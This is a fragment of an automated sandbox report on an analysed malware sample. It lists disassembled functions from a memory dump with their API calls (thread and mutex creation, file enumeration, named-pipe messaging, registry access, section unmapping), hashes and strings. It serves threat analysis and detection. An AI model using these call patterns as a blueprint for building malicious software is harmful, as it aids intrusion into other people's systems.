    • Part of subcall function 001C9AD3: LocalFree.KERNEL32(001CAB3A,?,?,?,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?), ref: 001C9BDC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
  • memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDB50, Relevance: 10.6, APIs: 7, Instructions: 122 Total matches: 55memorystring
Similarity
  • Total matches: 55
  • API ID: HeapFree$RtlImageNtHeaderStrChrStrTrimlstrlen
  • String ID:
  • API String ID: 3913414161-0
  • Opcode ID: 64ffad91cf0a2c2a078577b4f201d2562d86aecfc72bb8ed0596f04317282702
  • Instruction ID: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
  • Opcode Fuzzy Hash: 0401CB24280D82C289019CEE845C63AE54AFB033E290D75B2D7523C00E7B437AF7EF09
  • Instruction Fuzzy Hash: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • StrChrA.SHLWAPI(00000000,00000020), ref: 001CDB7A
  • StrTrimA.SHLWAPI(00000000,001E53CC), ref: 001CDB90
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • RtlImageNtHeader.NTDLL(?), ref: 001CDBB8
  • HeapFree.KERNEL32(00000000,?), ref: 001CDBDF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • lstrlen.KERNEL32(00000000,00000000,?), ref: 001CDC47
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CDC76
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CDC94
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DB703, Relevance: 10.6, APIs: 7, Instructions: 112 Total matches: 56synchronizationthread
Similarity
  • Total matches: 56
  • API ID: CreateEventCreateMutexCreateThreadGetLastErrorRtlInitializeCriticalSectionmemcpymemset
  • String ID:
  • API String ID: 850450842-0
  • Opcode ID: 16ca8f20d85ab577bbc2653173ab980685e792abd2a2311232cd2963c8cd0ec7
  • Instruction ID: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
  • Opcode Fuzzy Hash: EDF0DDF30A4E85BBE423A12250A13BA0A03B74A2CEF8D3510FBB5640590F6072E26D45
  • Instruction Fuzzy Hash: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
APIs
  • memset.NTDLL ref: 001DB75F
  • memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
  • RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
  • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
  • CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
  • GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1F61, Relevance: 10.6, APIs: 7, Instructions: 110 Total matches: 25memoryfilestring
Similarity
  • Total matches: 25
  • API ID: HeapFree$DeleteFileGetLastErrorInterlockedDecrementInterlockedIncrementlstrcpy
  • String ID:
  • API String ID: 699546578-0
  • Opcode ID: 532f2b5cd79be1598055c22557b2267d7091050a8bc957485613e12867e2baf4
  • Instruction ID: 7e10fe87f0924755e3c3f139aefbb8723367e80e6c71fdf06343399dbcc04d08
  • Opcode Fuzzy Hash: 63F076B8404D85CBC62364B588AA7BE46457F824E5D0CE33AA584B101B1F0365B79F85
  • Instruction Fuzzy Hash: 7e10fe87f0924755e3c3f139aefbb8723367e80e6c71fdf06343399dbcc04d08
APIs
  • InterlockedIncrement.KERNEL32(001EAF5C), ref: 001C1F73
  • lstrcpy.KERNEL32(00000000), ref: 001C1FA8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
    • Part of subcall function 001DD17E: memset.NTDLL ref: 001DD192
  • HeapFree.KERNEL32(00000000,?), ref: 001C2050
    • Part of subcall function 001DD36B: memset.NTDLL ref: 001DD3C6
    • Part of subcall function 001DD36B: SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD36B: WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
    • Part of subcall function 001DD36B: Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
  • GetLastError.KERNEL32(00000000), ref: 001C2039
  • InterlockedDecrement.KERNEL32(001EAF5C), ref: 001C2067
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2098
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000), ref: 001C2088
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2A39, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 102 Total matches: 43memory
Similarity
  • Total matches: 43
  • API ID: HeapFree$CloseHandleRtlImageNtHeader
  • String ID: [FILE]$[FILE]
  • API String ID: 2457384462-3230400787
  • Opcode ID: 16df8d8f854be46f27ed78846379e5e64a1e712c0788b603984e536008b4b39b
  • Instruction ID: 7a99e9afe2944490d027556a012c57452c29353fe49cd997913ba4f9baac3b11
  • Opcode Fuzzy Hash: 94F0AC39154F43A7892360C4A0207A99B84FFA21D1C8CA723E9857D1CF7E033262BE43
  • Instruction Fuzzy Hash: 7a99e9afe2944490d027556a012c57452c29353fe49cd997913ba4f9baac3b11
APIs
  • RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
  • CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2884: lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001C2884: WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
    • Part of subcall function 001C2884: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
    • Part of subcall function 001C2884: GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D9E63: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001D9E93
  • HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C70F5, Relevance: 10.6, APIs: 7, Instructions: 91 Total matches: 60memorystringsynchronization
Similarity
  • Total matches: 60
  • API ID: lstrlen$GetDriveTypeHeapFreeRtlAllocateHeapWaitForSingleObjectmemset
  • String ID:
  • API String ID: 3218151923-0
  • Opcode ID: 974418b0150871375a409eae20db66cf184f8890a346e9cc83530061c0aa9893
  • Instruction ID: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
  • Opcode Fuzzy Hash: 97F02461CA2887A7900B446974553AEDA116F416C9D4C0B62ED412814EAF0732E6EB4A
  • Instruction Fuzzy Hash: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C713F
  • memset.NTDLL ref: 001C715C
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C7178
  • GetDriveTypeW.KERNEL32(?), ref: 001C7186
  • lstrlenW.KERNEL32(?), ref: 001C7192
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • lstrlenW.KERNEL32(?), ref: 001C71BF
  • HeapFree.KERNEL32(00000000,?), ref: 001C71D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6DF6, Relevance: 10.6, APIs: 7, Instructions: 90 Total matches: 57filesynchronization
Similarity
  • Total matches: 57
  • API ID: GetLastError$CloseHandleSetEndOfFileSetFilePointerWaitForSingleObjectWriteFile
  • String ID:
  • API String ID: 1310882240-0
  • Opcode ID: 428b72d32063ac54d5b905598191ac261dcad3cf285b84f146690d990cf327a1
  • Instruction ID: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
  • Opcode Fuzzy Hash: CAF02BA0515DC14BC217346516727BFD904EB425C5E4C7372A840420494F06769BAB5A
  • Instruction Fuzzy Hash: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
APIs
  • GetLastError.KERNEL32 ref: 001D6E41
  • WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
  • SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
  • WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
  • SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
  • GetLastError.KERNEL32 ref: 001D6EDD
  • CloseHandle.KERNEL32(00000006), ref: 001D6EE9
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBD48, Relevance: 10.6, APIs: 7, Instructions: 89 Total matches: 58memorystringpipe
Similarity
  • Total matches: 58
  • API ID: memcpy$CallNamedPipeGetLastErrorHeapFreeRtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 1038157847-0
  • Opcode ID: 6bb6ae630451ca86ee9df0719d803bcc4810f9cd3f6b8a390704e6ae44b564aa
  • Instruction ID: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
  • Opcode Fuzzy Hash: 73F05990085A81D2C123B42951217FFF194BEC02DBCDEA772E8E21885E2E0162A06B5D
  • Instruction Fuzzy Hash: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
APIs
  • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
  • memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
  • memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
  • CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
  • GetLastError.KERNEL32 ref: 001CBE07
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C79A7, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 87 Total matches: 56memoryfilestring
Similarity
  • Total matches: 56
  • API ID: HeapFree$DeleteFileStrTrimlstrlen
  • String ID: ss: *.*.*.*
  • API String ID: 1870149019-856079725
  • Opcode ID: 59ebdf1013b10810b54038a6e3da88a7dec1c4f015ef1646412946d67e45a806
  • Instruction ID: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
  • Opcode Fuzzy Hash: ECF09E21084D41AF8937286A50607F50915FB804F1C4DCFB7AC857B2857F836228BB4B
  • Instruction Fuzzy Hash: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • lstrlen.KERNEL32(00000000,?,00000F00), ref: 001C79CB
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • StrTrimA.SHLWAPI(00000000,001E53D4), ref: 001C7A55
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7A72
  • DeleteFileA.KERNEL32(00000000,00000000,?,?,001ECE60,00000000,?,00000F00), ref: 001C7A7A
  • HeapFree.KERNEL32(00000000,00000000,001ECE60), ref: 001C7A89
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7D61, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 75 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: memcpy$RtlAllocateHeap
  • String ID: [URL]$https://
  • API String ID: 3738462082-2839221783
  • Opcode ID: afc151603a67bdcf01d5cf8a846d0f5f8a912d4aa94ead1b687b7b5f553c7413
  • Instruction ID: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
  • Opcode Fuzzy Hash: 21E02B245D1F02D6D85A20845438BB7C6873D42394CAE7766C950255772A25B174B588
  • Instruction Fuzzy Hash: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
APIs
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
  • memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
  • memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
  • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C771B, Relevance: 10.6, APIs: 7, Instructions: 71 Total matches: 62memoryfilestring
Similarity
  • Total matches: 62
  • API ID: HeapFree$CloseHandleCreateFileRtlAllocateHeaplstrlenmbstowcs
  • String ID:
  • API String ID: 1841334458-0
  • Opcode ID: 88abf7bf9e6c094b0eee3fb77fa4d18763972b4349be3218ed9dbfc152fe13ca
  • Instruction ID: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
  • Opcode Fuzzy Hash: 2BE02B71181D5096C02719A68C58339E6056F422E4E5D4627FA013910FB24317E8EBAB
  • Instruction Fuzzy Hash: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C7527: LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 001C75DB
    • Part of subcall function 001C7527: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001C75FC
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
  • lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
  • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
  • mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C7B90: GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
    • Part of subcall function 001C7B90: memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
    • Part of subcall function 001C7B90: RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
    • Part of subcall function 001C7B90: lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7B90: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
  • CloseHandle.KERNEL32(?), ref: 001C77C0
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2416, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 50memorystringthread
Similarity
  • Total matches: 50
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFreeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 1766977795-0
  • Opcode ID: b41ce86395a358d9a6be2e887350fb16e7ee7d04885f28ea6336c7c9663497fb
  • Instruction ID: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
  • Opcode Fuzzy Hash: A8E026A5068C0583807778228061BAF9B82BAC10D8C8D7123FE402614B2F037487DF2B
  • Instruction Fuzzy Hash: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
APIs
  • lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
  • RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
  • lstrcpy.KERNEL32(00000008,?), ref: 001C2462
  • CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
  • CloseHandle.KERNEL32(00000000), ref: 001C2485
  • GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4EEE, Relevance: 9.2, APIs: 6, Instructions: 187 Total matches: 61memorystringthread
Similarity
  • Total matches: 61
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeaplstrcmplstrlenwsprintf
  • String ID:
  • API String ID: 236900386-0
  • Opcode ID: 0432ee343612a59173c04e27a8b524be30c23a17c6314db2962a76565d5ddb3c
  • Instruction ID: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
  • Opcode Fuzzy Hash: F7119B31058EC2A7441760C18092BBED450FC920E580D37F2EEB86A2CE6F43258B2B1B
  • Instruction Fuzzy Hash: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
APIs
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C46AF
    • Part of subcall function 001C45F0: WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C473C
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
    • Part of subcall function 001C45F0: RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
    • Part of subcall function 001D829C: lstrlen.KERNEL32(?,00000000,001EABBC,?,001C194F,?), ref: 001D82A6
    • Part of subcall function 001D829C: StrRChrA.SHLWAPI(?,00000000,0000002E), ref: 001D82D1
    • Part of subcall function 001D829C: lstrcat.KERNEL32(00000000,?), ref: 001D8317
  • lstrcmp.KERNEL32(?,?), ref: 001C4F65
  • GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
  • GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C1916: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C192A
    • Part of subcall function 001C1916: RegCloseKey.ADVAPI32(?), ref: 001C1958
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
  • wsprintfA.USER32 ref: 001C50B7
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C8CA3, Relevance: 9.1, APIs: 6, Instructions: 72 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: HeapFreelstrlen$mbstowcswcstombs
  • String ID:
  • API String ID: 2099024402-0
  • Opcode ID: e75e910ff2ec0d94baf6de8394c43fdc3fb5dca6cdb9e0b5bf2cf534734101ee
  • Instruction ID: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
  • Opcode Fuzzy Hash: 88E02BB20C04C297060710B3847577DDA09BCC21D100E53ABDB08EC34DA68723A5BB6F
  • Instruction Fuzzy Hash: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
APIs
  • lstrlenW.KERNEL32(?), ref: 001C8CC7
  • wcstombs.NTDLL ref: 001C8CE7
    • Part of subcall function 001C8B4E: RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
